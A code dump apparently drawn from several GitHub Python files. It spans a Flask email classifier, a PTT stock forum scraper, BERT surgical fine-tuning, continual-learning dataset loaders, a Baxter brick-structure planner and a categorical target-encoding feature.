plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/logreg_Tfidf.png')
##XGBootClassification
xgb_pred_test,xgb_pred_test_tfidf=models.XGBootClassification(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("-------- XGBootClassification CountVector------")
print(classification_report(Y_test,xgb_pred_test))
randomclassifier1 = confusion_matrix(Y_test,xgb_pred_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/xgb_Count.png')
##confusion matrix and classification report using Tfidf
print("--------XGBootClassification tfidf------")
print(classification_report(Y_test,xgb_pred_test_tfidf))
randomclassifier2 = confusion_matrix(Y_test,xgb_pred_test_tfidf)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/xgb_Tfidf.png')
##KNNCLassification
modelknn_test, modelknn_tfidf_test = models.KNNCLassification(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("-------- KNN Classification CountVector------")
print(classification_report(Y_test,modelknn_test))
randomclassifier1 = confusion_matrix(Y_test,modelknn_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/knn_Count.png')
##confusion matrix and classification report using Tfidf
print("--------KNN Classification tfidf------")
print(classification_report(Y_test,modelknn_tfidf_test))
randomclassifier2 = confusion_matrix(Y_test,modelknn_tfidf_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/knn_Tfidf.png')
return render_template('home.html')
#return 'File Uploaded successfully'
#print(data_xls)
#return data_xls.to_html()
return render_template('file.html')
#return "File uploaded successfully"
@app.route("/predict", methods=['GET', 'POST'])
def predictor():
p = predict()
if request.method == 'POST':
message = request.form['mail']
data = [message]
result = p.prediction(data)
#result = str(result)
#print(result)
#print(type(result))
return render_template('sample.html', tables=[result.to_html(classes='data')], titles=result.columns.values)
#return result
return render_template('predict.html')
@app.route("/evalute")
def evalute():
return render_template('dash.html')
@app.route("/export", methods=['GET'])
def export_records():
return
if __name__ == "__main__":
app.run()
| Pooja-AI/Email-Classification | file.py | file.py | py | 10,841 | python | en | code | 0 | github-code | 36 |
37348251487 | from my_radial_grid import *
beta = 0.4
N = 150*(2 + 1)
ae_grid = MyAERadialGridDescriptor(beta/N, 1.0/N, N)
# Grid points in this case is
# a g
# r(g) = -------, g = 0, 1, ..., N - 1
# 1 - b g
print("Grid parameters:")
print("a = ", ae_grid.a)
print("b = ", ae_grid.b)
# Grid points and derivative
NradialPoints = len(ae_grid)
r_g = ae_grid.r_g
dr_g = ae_grid.dr_g
for i in range(NradialPoints):
print("{:18.10f} {:18.10f}".format(r_g[i], dr_g[i]))
#print(ae_grid.dv_g)
#print(ae_grid.default_spline_points) | f-fathurrahman/ffr-learns-gpaw | ae_generator/test_radial_grid_02.py | test_radial_grid_02.py | py | 567 | python | en | code | 0 | github-code | 36 |
41166932292 | # pip install requests bs4 lxml
# pip install jieba
import requests
import bs4
import jieba
import csv
stocks = set()
def prepare_stocks():
with open('week3/Stock.csv', encoding='utf-8') as csv_file:
csv_reader = csv.reader(csv_file)
stock_list = list(csv_reader)
for stock in stock_list[2:]:
stocks.add(stock[1])
def get_text(o):
return '' if o is None else o.text
def read_article(url):
html = requests.get('https://www.ptt.cc' + url)
soup = bs4.BeautifulSoup(html.text, 'lxml')
rows = soup.select('div.push')
for row in rows:
content = get_text(row.select_one('.push-content'))
issuer = get_text(row.select_one('.push-userid'))
created = get_text(row.select_one('.push-ipdatetime'))
tokens = jieba.lcut(content)
keywords = {}
for token in tokens:
if token in stocks:
if token in keywords:
keywords[token] += 1
else:
keywords[token] = 1
print(keywords)
def read_topic():
html = requests.get('https://www.ptt.cc/bbs/Stock/index.html')
soup = bs4.BeautifulSoup(html.text, 'lxml')
rows = soup.select('div.r-ent')
for row in rows:
anchor = row.select_one('.title a')
if anchor is not None:
url = anchor['href']
title = anchor.text
count = get_text(row.select_one('.nrec'))
issuer = get_text(row.select_one('.author'))
created = get_text(row.select_one('.date'))
tokens = jieba.lcut(title)
keywords = {}
for token in tokens:
if token in stocks:
if token in keywords:
keywords[token] += 1
else:
keywords[token] = 1
print(keywords)
read_article(url)
prepare_stocks()
read_topic() | andrewintw/learning-python-web-crawler | week3/lab00_ptt_from_teacher.py | lab00_ptt_from_teacher.py | py | 2,001 | python | en | code | 0 | github-code | 36 |
37502377637 | # https://swexpertacademy.com/main/code/problem/problemDetail.do?contestProbId=AV4suNtaXFEDFAUf
"""
단순한 구현 문제
사용된 코어와 사용할 코어의 개수가 최대로 사용했던 코어의 개수보다 적으면 더이상 탐색하지 않는다.
"""
dire = [[-1, 0], [1, 0], [0, -1], [0, 1]]
def DRAW(x, y, d, graph):
tx, ty = x + dire[d][0], y + dire[d][1]
while 0 <= tx < len(graph) and 0 <= ty < len(graph):
if graph[tx][ty] == 1 or visit[tx][ty] == 1:
return [0, 0]
tx += dire[d][0]
ty += dire[d][1]
result = 0
tx, ty = x + dire[d][0], y + dire[d][1]
while 0 <= tx < len(graph) and 0 <= ty < len(graph):
visit[tx][ty] = 1
result += 1
tx += dire[d][0]
ty += dire[d][1]
return [1, result]
def REMOVE(x, y, d, graph):
tx, ty = x + dire[d][0], y + dire[d][1]
while 0 <= tx < len(graph) and 0 <= ty < len(graph):
visit[tx][ty] = 0
tx += dire[d][0]
ty += dire[d][1]
def BACK(depth: int, useCore : int, value : int):
global ans, MaxCore
# 남은 코어를 전부 사용해도 최대로 코어를 사용했을 때보다 적으면 return
if MaxCore > useCore + (len(location) - depth): return
if depth == len(location):
# 사용한 코어의 개수가 같을 때 최솟값 구하기
if useCore == MaxCore and value > ans : return
MaxCore = useCore
ans = value
return
for i in range(4):
us = DRAW(location[depth][0], location[depth][1], i, graph)
useCore += us[0]
value += us[1]
BACK(depth + 1, useCore, value)
if us[0] == 1: REMOVE(location[depth][0], location[depth][1], i, graph)
useCore -= us[0]
value -= us[1]
T = int(input())
for test_case in range(1, T + 1):
N = int(input())
location = []
graph = []
visit = [[0] * N for _ in range(N)]
for i in range(N):
arr = list(map(int, input().split()))
for j in range(N):
if 0 < i < N - 1 and 0 < j < N - 1 and arr[j]:
location.append([i, j])
graph.append(arr)
ans = 0x7fffffff
MaxCore = 0
BACK(0, 0, 0)
print(f"#{test_case} {ans}")
| junsgi/Algorithm | BackTracking/[SW Test 샘플문제] 프로세서 연결하기.py | [SW Test 샘플문제] 프로세서 연결하기.py | py | 2,239 | python | ko | code | 0 | github-code | 36 |
8591398196 | import torch
import torch.nn as nn
import torch.nn.functional as F
import copy
import numpy as np
from itertools import chain
class SurgicalFineTuningBert(nn.Module):
def __init__(
self,
bert_model,
) -> None:
super().__init__()
self.get_extended_attention_mask = bert_model.get_extended_attention_mask
# copy the model
self.opti_embedding_block = bert_model.bert.embeddings
self.frozen_embedding_block = copy.deepcopy(self.opti_embedding_block)
self.opti_bert_layers = bert_model.bert.encoder.layer
self.frozen_bert_layers = copy.deepcopy(self.opti_bert_layers)
self.opti_bert_pooler = bert_model.bert.pooler
self.frozen_bert_pooler = copy.deepcopy(self.opti_bert_pooler)
self.opti_bert_classifier = bert_model.classifier
self.frozen_bert_classifier = copy.deepcopy(self.opti_bert_classifier)
frozen_params = chain(
self.frozen_embedding_block.parameters(),
self.frozen_bert_layers.parameters(),
self.frozen_bert_pooler.parameters(),
self.frozen_bert_classifier.parameters(),
)
for param in frozen_params:
param.requires_grad = False
self.dropout = nn.Sequential(bert_model.dropout)
if (
"bert-small" in bert_model.name_or_path
or "bert-med" in bert_model.name_or_path
):
self.alphas = nn.Parameter(
torch.zeros(len(bert_model.bert.encoder.layer) + 3)
)
else:
self.alphas = nn.Parameter(
torch.zeros(len(bert_model.bert.encoder.layer) + 1)
)
def forward(self, x):
input_ids, attention_mask = x["input_ids"], x["attention_mask"]
extended_attention_mask = self.get_extended_attention_mask(
attention_mask, input_ids.size()
)
alpha_embeddings, alphas_layers, alpha_pooler, alpha_classifier = (
self.alphas[0],
self.alphas[:-2],
self.alphas[-2],
self.alphas[-1],
)
x_opti, x_frozen = self.opti_embedding_block(
input_ids
), self.frozen_embedding_block(input_ids)
a = alpha_embeddings.sigmoid()
x = a * self.opti_embedding_block(input_ids) + (
1 - a
) * self.frozen_embedding_block(input_ids)
for i in range(len(self.opti_bert_layers)):
a = alphas_layers[i].sigmoid()
if i > 0:
x_opti, x_frozen = x, x
x = (
a
* self.opti_bert_layers[i](
x_opti, attention_mask=extended_attention_mask
)[0]
+ (1 - a)
* self.frozen_bert_layers[i](
x_frozen, attention_mask=extended_attention_mask
)[0]
)
a = alpha_pooler.sigmoid()
x = a * self.opti_bert_pooler(x) + (1 - a) * self.frozen_bert_pooler(x)
x = self.dropout(x)
a = alpha_classifier.sigmoid()
x = a * self.opti_bert_classifier(x) + (1 - a) * self.frozen_bert_classifier(x)
return x
def forward_alphas(self, x, alphas):
alpha_embeddings, alphas_layers, alpha_pooler, alpha_classifier = (
alphas[0],
alphas[:-2],
alphas[-2],
alphas[-1],
)
input_ids, attention_mask = x["input_ids"], x["attention_mask"]
extended_attention_mask = self.get_extended_attention_mask(
attention_mask, input_ids.size()
)
a = alpha_embeddings.sigmoid()
x = a * self.opti_embedding_block(input_ids) + (
1 - a
) * self.frozen_embedding_block(input_ids)
x_opti, x_frozen = self.opti_embedding_block(
input_ids
), self.frozen_embedding_block(input_ids)
for i in range(len(self.opti_bert_layers)):
a = alphas_layers[i].sigmoid()
if i > 0:
x_opti, x_frozen = x, x
x = (
a
* self.opti_bert_layers[i](
x_opti, attention_mask=extended_attention_mask
)[0]
+ (1 - a)
* self.frozen_bert_layers[i](
x_frozen, attention_mask=extended_attention_mask
)[0]
)
a = alpha_pooler.sigmoid()
x = a * self.opti_bert_pooler(x) + (1 - a) * self.frozen_bert_pooler(x)
x = self.dropout(x)
a = alpha_classifier.sigmoid()
x = a * self.opti_bert_classifier(x) + (1 - a) * self.frozen_bert_classifier(x)
return x
def get_alphas(self):
return [float(a.sigmoid()) for a in self.alphas]
| AntoineBigeard/NLPSurgicalFineTuning | src/pimped_bert.py | pimped_bert.py | py | 4,780 | python | en | code | 2 | github-code | 36 |
70345439783 | import os
import sys
import pdb
import torch
import numpy as np
import pickle as pkl
from PIL import Image
from random import shuffle
from torchvision import datasets, transforms
""" Template Dataset with Labels """
class XYDataset(torch.utils.data.Dataset):
def __init__(self, x, y, **kwargs):
self.x, self.y = x, y
# this was to store the inverse permutation in permuted_mnist
# so that we could 'unscramble' samples and plot them
for name, value in kwargs.items():
setattr(self, name, value)
def __len__(self):
return len(self.x)
def __getitem__(self, idx):
x, y = self.x[idx], self.y[idx]
if type(x) != torch.Tensor:
# mini_imagenet
# we assume it's a path --> load from file
x = self.transform(Image.open(x).convert('RGB'))
y = torch.Tensor(1).fill_(y).long().squeeze()
else:
x = x.float() / 255.
y = y.long()
# for some reason mnist does better \in [0,1] than [-1, 1]
if self.source == 'mnist':
return x, y
else:
return (x - 0.5) * 2, y
""" Template Dataset for Continual Learning """
class CLDataLoader(object):
def __init__(self, datasets_per_task, args, train=True):
bs = args.batch_size if train else 64
self.datasets = datasets_per_task
# concat_list = []
# for x in self.datasets:
# concat_list.append(x)
# print('loader x', x)
self.loaders = [
torch.utils.data.DataLoader(x, batch_size=bs, shuffle=True, drop_last=train, num_workers=0)
for x in self.datasets ]
# print('len(concat_list)', len(concat_list))
# print('len(self.loaders)', len(self.loaders))
def __getitem__(self, idx):
return self.loaders[idx]
def __len__(self):
return len(self.loaders)
""" Split CIFAR10 into 5 tasks {{0,1}, ... {8,9}} """
def get_split_cifar10(args):
# assert args.n_tasks in [5, 10], 'SplitCifar only works with 5 or 10 tasks'
assert '1.' in str(torch.__version__)[:2], 'Use Pytorch 1.x!'
args.n_tasks = 5
args.n_classes = 10
args.buffer_size = args.n_tasks * args.mem_size * 2
args.use_conv = True
args.n_classes_per_task = 2
args.input_size = [3, 32, 32]
args.input_type = 'continuous'
# because data is between [-1,1]:
assert args.output_loss is not 'bernouilli'
if args.output_loss == None:
#TODO(multinomial is broken)
#args.output_loss = 'multinomial'
args.output_loss = 'mse'
print('\nsetting output loss to MSE')
# fetch MNIST
train = datasets.CIFAR10('Data/', train=True, download=True)
test = datasets.CIFAR10('Data/', train=False, download=True)
try:
train_x, train_y = train.data, train.targets
test_x, test_y = test.data, test.targets
except:
train_x, train_y = train.train_data, train.train_labels
test_x, test_y = test.test_data, test.test_labels
# sort according to the label
out_train = [
(x,y) for (x,y) in sorted(zip(train_x, train_y), key=lambda v : v[1]) ]
out_test = [
(x,y) for (x,y) in sorted(zip(test_x, test_y), key=lambda v : v[1]) ]
train_x, train_y = [
np.stack([elem[i] for elem in out_train]) for i in [0,1] ]
test_x, test_y = [
np.stack([elem[i] for elem in out_test]) for i in [0,1] ]
train_x = torch.Tensor(train_x).permute(0, 3, 1, 2).contiguous()
test_x = torch.Tensor(test_x).permute(0, 3, 1, 2).contiguous()
train_y = torch.Tensor(train_y)
test_y = torch.Tensor(test_y)
# get indices of class split
train_idx = [((train_y + i) % 10).argmax() for i in range(10)]
train_idx = [0] + [x + 1 for x in sorted(train_idx)]
test_idx = [((test_y + i) % 10).argmax() for i in range(10)]
test_idx = [0] + [x + 1 for x in sorted(test_idx)]
train_ds, test_ds = [], []
skip = 10 // 5 #args.n_tasks
for i in range(0, 10, skip):
tr_s, tr_e = train_idx[i], train_idx[i + skip]
te_s, te_e = test_idx[i], test_idx[i + skip]
train_ds += [(train_x[tr_s:tr_e], train_y[tr_s:tr_e])]
test_ds += [(test_x[te_s:te_e], test_y[te_s:te_e])]
train_ds, val_ds = make_valid_from_train(train_ds)
train_ds = map(lambda x : XYDataset(x[0], x[1], **{'source':'cifar10'}), train_ds)
val_ds = map(lambda x : XYDataset(x[0], x[1], **{'source':'cifar10'}), val_ds)
test_ds = map(lambda x : XYDataset(x[0], x[1], **{'source':'cifar10'}), test_ds)
return train_ds, val_ds, test_ds
def get_split_cifar100(args):
# assert args.n_tasks in [5, 10], 'SplitCifar only works with 5 or 10 tasks'
assert '1.' in str(torch.__version__)[:2], 'Use Pytorch 1.x!'
args.n_tasks = 20
args.n_classes = 100
args.buffer_size = args.n_tasks * args.mem_size * 5
args.use_conv = True
args.n_classes_per_task = 5
args.input_size = [3, 32, 32]
args.input_type = 'continuous'
# because data is between [-1,1]:
assert args.output_loss is not 'bernouilli'
if args.output_loss == None:
#TODO(multinomial is broken)
#args.output_loss = 'multinomial'
args.output_loss = 'mse'
print('\nsetting output loss to MSE')
# fetch MNIST
train = datasets.CIFAR100('Data/', train=True, download=True)
test = datasets.CIFAR100('Data/', train=False, download=True)
try:
train_x, train_y = train.data, train.targets
test_x, test_y = test.data, test.targets
except:
train_x, train_y = train.train_data, train.train_labels
test_x, test_y = test.test_data, test.test_labels
# sort according to the label
out_train = [
(x,y) for (x,y) in sorted(zip(train_x, train_y), key=lambda v : v[1]) ]
out_test = [
(x,y) for (x,y) in sorted(zip(test_x, test_y), key=lambda v : v[1]) ]
train_x, train_y = [
np.stack([elem[i] for elem in out_train]) for i in [0,1] ]
test_x, test_y = [
np.stack([elem[i] for elem in out_test]) for i in [0,1] ]
train_x = torch.Tensor(train_x).permute(0, 3, 1, 2).contiguous()
test_x = torch.Tensor(test_x).permute(0, 3, 1, 2).contiguous()
train_y = torch.Tensor(train_y)
test_y = torch.Tensor(test_y)
# get indices of class split
train_idx = [((train_y + i) % 100).argmax() for i in range(100)]
train_idx = [0] + [x + 1 for x in sorted(train_idx)]
test_idx = [((test_y + i) % 100).argmax() for i in range(100)]
test_idx = [0] + [x + 1 for x in sorted(test_idx)]
train_ds, test_ds = [], []
skip = 100 // 20 #args.n_tasks
for i in range(0, 100, skip):
tr_s, tr_e = train_idx[i], train_idx[i + skip]
te_s, te_e = test_idx[i], test_idx[i + skip]
train_ds += [(train_x[tr_s:tr_e], train_y[tr_s:tr_e])]
test_ds += [(test_x[te_s:te_e], test_y[te_s:te_e])]
train_ds, val_ds = make_valid_from_train(train_ds)
train_ds = map(lambda x : XYDataset(x[0], x[1], **{'source':'cifar10'}), train_ds)
val_ds = map(lambda x : XYDataset(x[0], x[1], **{'source':'cifar10'}), val_ds)
test_ds = map(lambda x : XYDataset(x[0], x[1], **{'source':'cifar10'}), test_ds)
return train_ds, val_ds, test_ds
def get_miniimagenet(args):
print('loading miniimagenet dataset')
ROOT_PATH = '/Data/Miniimagenet/'
args.use_conv = True
args.n_tasks = 20
args.n_classes = 100
args.n_classes_per_task = 5
args.input_size = (3, 84, 84)
label2id = {}
def get_data(setname):
ds_dir = os.path.join(ROOT_PATH, setname)
label_dirs = os.listdir(ds_dir)
data, labels = [], []
for label in label_dirs:
label_dir = os.path.join(ds_dir, label)
for image_file in os.listdir(label_dir):
data.append(os.path.join(label_dir, image_file))
if label not in label2id:
label_id = len(label2id)
label2id[label] = label_id
label_id = label2id[label]
labels.append(label_id)
return data, labels
transform = transforms.Compose([
transforms.Resize(84),
transforms.CenterCrop(84),
transforms.ToTensor(),
])
train_data, train_label = get_data('meta_train')
valid_data, valid_label = get_data('meta_val')
test_data, test_label = get_data('meta_test')
# total of 60k examples for training, the rest for testing
all_data = np.array(train_data + valid_data + test_data)
all_label = np.array(train_label + valid_label + test_label)
train_ds, test_ds = [], []
current_train, current_test = None, None
cat = lambda x, y: np.concatenate((x, y), axis=0)
for i in range(args.n_classes):
class_indices = np.argwhere(all_label == i).reshape(-1)
class_data = all_data[class_indices]
class_label = all_label[class_indices]
split = int(0.8 * class_data.shape[0])
data_train, data_test = class_data[:split], class_data[split:]
label_train, label_test = class_label[:split], class_label[split:]
if current_train is None:
current_train, current_test = (data_train, label_train), (data_test, label_test)
else:
current_train = cat(current_train[0], data_train), cat(current_train[1], label_train)
current_test = cat(current_test[0], data_test), cat(current_test[1], label_test)
if i % args.n_classes_per_task == (args.n_classes_per_task - 1):
train_ds += [current_train]
test_ds += [current_test]
current_train, current_test = None, None
# build masks
masks = []
task_ids = [None for _ in range(20)]
for task, task_data in enumerate(train_ds):
labels = np.unique(task_data[1]) #task_data[1].unique().long()
assert labels.shape[0] == args.n_classes_per_task
mask = torch.zeros(args.n_classes).cuda()
mask[labels] = 1
masks += [mask]
task_ids[task] = labels
task_ids = torch.from_numpy(np.stack(task_ids)).cuda().long()
print('task_ids', task_ids)
train_ds, val_ds = make_valid_from_train(train_ds)
train_ds = map(lambda x, y : XYDataset(x[0], x[1], **{'source':'cifar100', 'mask':y, 'task_ids':task_ids, 'transform':transform}), train_ds, masks)
val_ds = map(lambda x, y: XYDataset(x[0], x[1], **{'source': 'cifar100', 'mask': y, 'task_ids': task_ids, 'transform': transform}), val_ds, masks)
test_ds = map(lambda x, y : XYDataset(x[0], x[1], **{'source':'cifar100', 'mask':y, 'task_ids':task_ids, 'transform':transform}), test_ds, masks)
return train_ds, val_ds, test_ds
def make_valid_from_train(dataset, cut=0.95):
tr_ds, val_ds = [], []
for task_ds in dataset:
x_t, y_t = task_ds
# shuffle before splitting
perm = torch.randperm(len(x_t))
x_t, y_t = x_t[perm], y_t[perm]
split = int(len(x_t) * cut)
x_tr, y_tr = x_t[:split], y_t[:split]
x_val, y_val = x_t[split:], y_t[split:]
tr_ds += [(x_tr, y_tr)]
val_ds += [(x_val, y_val)]
return tr_ds, val_ds
class IIDDataset(torch.utils.data.Dataset):
def __init__(self, data_loaders, seed=0):
self.data_loader = data_loaders
self.idx = []
for task_id in range(len(data_loaders)):
for i in range(len(data_loaders[task_id].dataset)):
self.idx.append((task_id, i))
random.Random(seed).shuffle(self.idx)
def __getitem__(self, idx):
task_id, instance_id = self.idx[idx]
return self.data_loader[task_id].dataset.__getitem__(instance_id)
def __len__(self):
return len(self.idx) | joey-wang123/DRO-Task-free | data.py | data.py | py | 11,866 | python | en | code | 11 | github-code | 36 |
43319179836 | #!/usr/bin/env python
from geometry_msgs.msg import (
PoseStamped,
Pose,
Point,
Quaternion,
)
def house_coordinates(x, y, z, width, height):
'''
This function takes in coordinates x, y, z to determine where
the structure will be built from. It also takes in the width and
height of the structure you want to build and outputs coordinates
stored in a list for each layer within the greater list. The
coordinates are output in the correct order, for each layer the
first brick to be picked is the middle one for odd number of brick
layers and the right hand side middle brick for even number of
brick layers. The right arm will always pick up the first brick
of each layer.
'''
# maximum structure is 0.8m width and 1.04m height
# see documentaion for baxter reachable workspace http://mfg.rethinkrobotics.com/wiki/Workspace_Guidelines#tab.3DBaxter
if y > 0.8:
print('You have input the maximum width!')
if z > 1.04:
print('You have input the maximum height!')
t = 0.06 # thickness of brick
w = 0.09 # width of brick
h = 0.2 # height of brick
# bottom of table is currently (0,0,0)
# a list which will contain all positions in order, with lists in the list for each layer
list_of_positions = []
# a list for the number of bricks in each layer
layers = [5, 4, 4, 3, 3, 2, 2, 1]
# the structure will always begin with vertical bricks as the first layer to be built
# height determines number of layers
# if the height is divided by the height + thickness of the brick and the remainder< than 200 (brick height= 200mm), this means that there is not enough height to build an extra vertical brick layer so the height will be an even number of layers
if (height*1000)%((h*1000)+(t*1000)) < 200:
# this structure's height will be divisible by h+t
# the number of layers is therefore equal to the integer value of (height/h+t)*2
number_of_layers = int(height/(h+t))*2
else:
# this structure's height will be divisible by (h+t) + 1
# if the remainder > 200, then the height is tall enough to fit another vertical brick layer and the number of layers is equal to the integer value of (height/h+t)*2 + 1
# number of layers is equal to the integer value of (height/h+t)*2 + 1
number_of_layers = int(height/(h+t))*2 + 1
# width determines which element in layers to start from
if int((width*10)/(h*10)) == 4:
#start from 1st element
layers = layers
elif int((width*10)/(h*10)) == 3:
#start from 3rd element (delete first 2 elements)
del layers[0:2]
elif int((width*10)/(h*10)) == 2:
#start from 5th element (delete first 4 elements)
del layers[0:4]
elif int((width*10)/(h*10)) == 1:
#start from 7th element (delete first 6 elements)
del layers[0:6]
# number_of_layers is currently defined by the height of the structure, if the width of the structure is too small that it cannot build to that height this would be an invalid number of times to run the loop for
# when the length of the layers list is smaller than the value of the number_of_layers (when width is smaller than height) then number_of_layers is equal to instead the length of layers
if len(layers) < number_of_layers:
print('The width of the structure you input is too small to build this high!')
number_of_layers = len(layers)
#coefficients for alternating brick picking from middle for odd and even brick layers
#coefficients include the length of bricks and the 2cm buffer between bricks
coefficient_odd = [0, 1.1, -1.1, 2.2, -2.2]
coefficient_even = [-0.55, 0.55, -1.65, 1.65]
#count layers
count_layer = 1
# iterate through each layer
for i in range(number_of_layers):
# list to store coordinates for this specific layer
layer_list = []
# value of current layer
current_layer = layers[i]
# count bricks
count_brick = 1
# iterate through bricks in this layer
for j in range(current_layer):
# if layer is ODD NUMBER OF BRICKS
# layer will be odd if the current layer %2 = 1 and even if = 0
if current_layer%2 == 1:
# y is horizontal coordinate
# indexing count_brick will assign the correct coefficient
y = coefficient_odd[count_brick-1]*h
# z is the vertical coordinate
# calculate how many (h+t)s are in the structure and if an extra h needs to be added for the odd layers
# -0.03 for the gripper position from top of brick
z= int(((count_layer)/2))*(h+t) + h*((count_layer)%2) - 0.03
#append coordinates into layer list
layer_list.append((x,y,z))
#move on to next brick
count_brick += 1
# if layer is EVEN NUMBER OF BRICKS
elif current_layer%2 == 0:
# y is horizontal coordinate
# indexing count_brick will assign the correct coefficient
y= coefficient_even[count_brick-1]*h
# z is the vertical coordinate
# calculate how many (h+t)s are in the structure and if an extra h needs to be added for the odd layers
# -0.03 for the gripper position from top of brick
z= int(((count_layer)/2))*(h+t) + h*((count_layer)%2) - 0.03
#append coordinates into layer list
layer_list.append((x,y,z))
#move on to next brick
count_brick = count_brick + 1
# move on to next layer
count_layer = count_layer + 1
#append each layer list into greater list
list_of_positions.append(layer_list)
print(list_of_positions)
return list_of_positions
def posify(Coordinates, v_orientation, h_orientation):
'''
This function onverts all the brick postitions to poses for baxter to read
it takes in the two types of quaternions (vertical or horizontal) and sorts
the poses out based on the type of later (horizontal or vertical)
'''
#if block_poses[i][j] = int
for i in range(len(Coordinates)):
for j in range(len(Coordinates[i])):
if i % 2:
p = Coordinates[i][j][0]
u = Coordinates[i][j][1]
v = Coordinates[i][j][2]
Coordinates[i][j] =(Pose(
position=Point(x = p, y = u, z = v),
orientation=h_orientation))
else:
p = Coordinates[i][j][0]
u = Coordinates[i][j][1]
v = Coordinates[i][j][2]
Coordinates[i][j] =(Pose(
position=Point(x = p, y = u, z = v),
orientation=v_orientation))
print (Coordinates)
return Coordinates
| ansonthalia/DE_robotics1 | Final_Submission/House_Builder.py | House_Builder.py | py | 7,047 | python | en | code | 0 | github-code | 36 |
18488873840 | from utility import log, timeit, Timer
import CONSTANT
from concurrent.futures import ProcessPoolExecutor
import datetime
import numpy as np
import os
import pandas as pd
import CONSTANT
import gc
from CONSTANT import LABEL,NUMERICAL_PREFIX,LABEL_CNT_SUFFIX
@timeit
def cat_Lable_Cnt_Fun(train_data, y, test_data, config):
timer = Timer()
cat_feature_list = [c for c in train_data if c.startswith(CONSTANT.CATEGORY_PREFIX)]
if len(cat_feature_list) == 0: return None
# train_data_length = len(train_data)
train_data[LABEL] = y
row_sp = int(np.ceil((len(train_data) + len(test_data)) / 1000000))
col_sp = int(np.ceil(len(cat_feature_list) / 20))
sp= row_sp * col_sp
print(f' **** We should split it as {sp}, {col_sp}-{row_sp} sp to process! ****')
cols_split = np.array_split(cat_feature_list, sp)
data_list = []
for i, cols in enumerate(cols_split):
if len(cols) >= 1:
pool = ProcessPoolExecutor(4)
result_list = pool.map(cat_Lable_Cnt_Fun_sub,
[[train_data[[col, LABEL]], test_data[[col]], col, config['pos_rate'], config[CONSTANT.TRAIN_LEN_OF_TRAIN_VAL]] for col in
cols])
pool.shutdown(wait=True)
for i_data in result_list:
if i_data is not None:
data_list += i_data
print(f'{i} split successful')
# feature_data = pd.concat(data_list, axis=1, copy=False)
# feature_data.columns = name_list
# timer.check("label count map done")
# del data_list
# gc.collect()
test_data.drop(cat_feature_list, axis=1, inplace=True)
cat_feature_list+=[LABEL]
train_data.drop(cat_feature_list, axis=1, inplace=True)
timer.check("drop")
return data_list
def cat_Lable_Cnt_Fun_sub(params):
train_df, test_df, c, prior, train_len_of_trainVal = params
df_target_list = []
col_name = NUMERICAL_PREFIX + c + LABEL_CNT_SUFFIX
df_target_list.append(CatLabelCntClass(prior, train_len_of_trainVal).fit_transform(train_df, test_df).rename(col_name))
if len(df_target_list) == 0:
return None
return df_target_list
class CatLabelCntClass:
def __init__(self, prior, train_len_of_trainVal):
self.prior = prior
self.train_len_of_trainVal = train_len_of_trainVal
def fit_transform(self, X, test_X):
col = X.columns[0]
label = X.columns[1]
# CONSTANT.ROLLING_FOLD_WINDOW
X_label_cnt_list = []
num_per_fold = int(np.ceil(self.train_len_of_trainVal / CONSTANT.FOLD_NUM))
index_range = np.arange(self.train_len_of_trainVal)
for i in range(CONSTANT.FOLD_NUM - 1):
large_split = list(index_range[ : (i+1)*num_per_fold])
small_split = list(index_range[(i+1)*num_per_fold : (i+2)*num_per_fold])
if len(small_split)==0: break
label_cnt = X.iloc[large_split].groupby(col).agg({label: ['count','sum']})
label_cnt.columns = label_cnt.columns.get_level_values(1)
label_cnt['label_cnt'] = (label_cnt['sum'] + self.prior)/ (label_cnt['count'] + 1)
label_cnt_result = X.iloc[small_split].reset_index().merge(label_cnt, how='left', on=col).fillna(value={'label_cnt':self.prior}).set_index('index')
X_label_cnt_list.append(label_cnt_result['label_cnt'])
del label_cnt, label_cnt_result
if i == 0:
# 处理最开始的数据
first_roll_data = X.iloc[large_split]
first_roll_data['label_cnt'] = self.prior
X_label_cnt_list.append(first_roll_data['label_cnt'])
del first_roll_data
# 处理验证集数据
index_range = np.arange(len(X))
large_split = list(index_range[: self.train_len_of_trainVal])
small_split = list(index_range[ self.train_len_of_trainVal:])
label_cnt = X.iloc[large_split].groupby(col).agg({label: ['count', 'sum']})
label_cnt.columns = label_cnt.columns.get_level_values(1)
label_cnt['label_cnt'] = (label_cnt['sum'] + self.prior) / (label_cnt['count'] + 1)
label_cnt_result = X.iloc[small_split].reset_index().merge(label_cnt, how='left', on=col).fillna(
value={'label_cnt': self.prior}).set_index('index')
X_label_cnt_list.append(label_cnt_result['label_cnt'])
del label_cnt, label_cnt_result
# 处理测试集数据
label_cnt = X.groupby(col).agg({label: ['count', 'sum']})
label_cnt.columns = label_cnt.columns.get_level_values(1)
label_cnt['label_cnt'] = (label_cnt['sum'] + self.prior) / (label_cnt['count'] + 1)
label_cnt_result = test_X.reset_index().merge(label_cnt, how='left', on=col).fillna(value={'label_cnt':self.prior}).set_index('index')
X_label_cnt_list.append(label_cnt_result['label_cnt'])
result = pd.concat(X_label_cnt_list, axis = 0).astype('float32')
# result.sort_index(inplace = True)
del label_cnt, label_cnt_result
return result | HantaoShu/KDD2019-Challenge | Lib_preprocess/catFeatureLabelCnt.py | catFeatureLabelCnt.py | py | 5,098 | python | en | code | 5 | github-code | 36 |
16667044604 | import os
import pydicom
import numpy as np
import dicom_numpy
from utils import hidden_errors
from tf_utils import *
from pathlib import Path
def read_dicom_folder(dicom_folder, rescale=None):
''' Reads all .dcm files in `dicom_folder` and merges them to one volume
Returns:
The volume and the affine transformation from pixel indices to xyz coordinates
'''
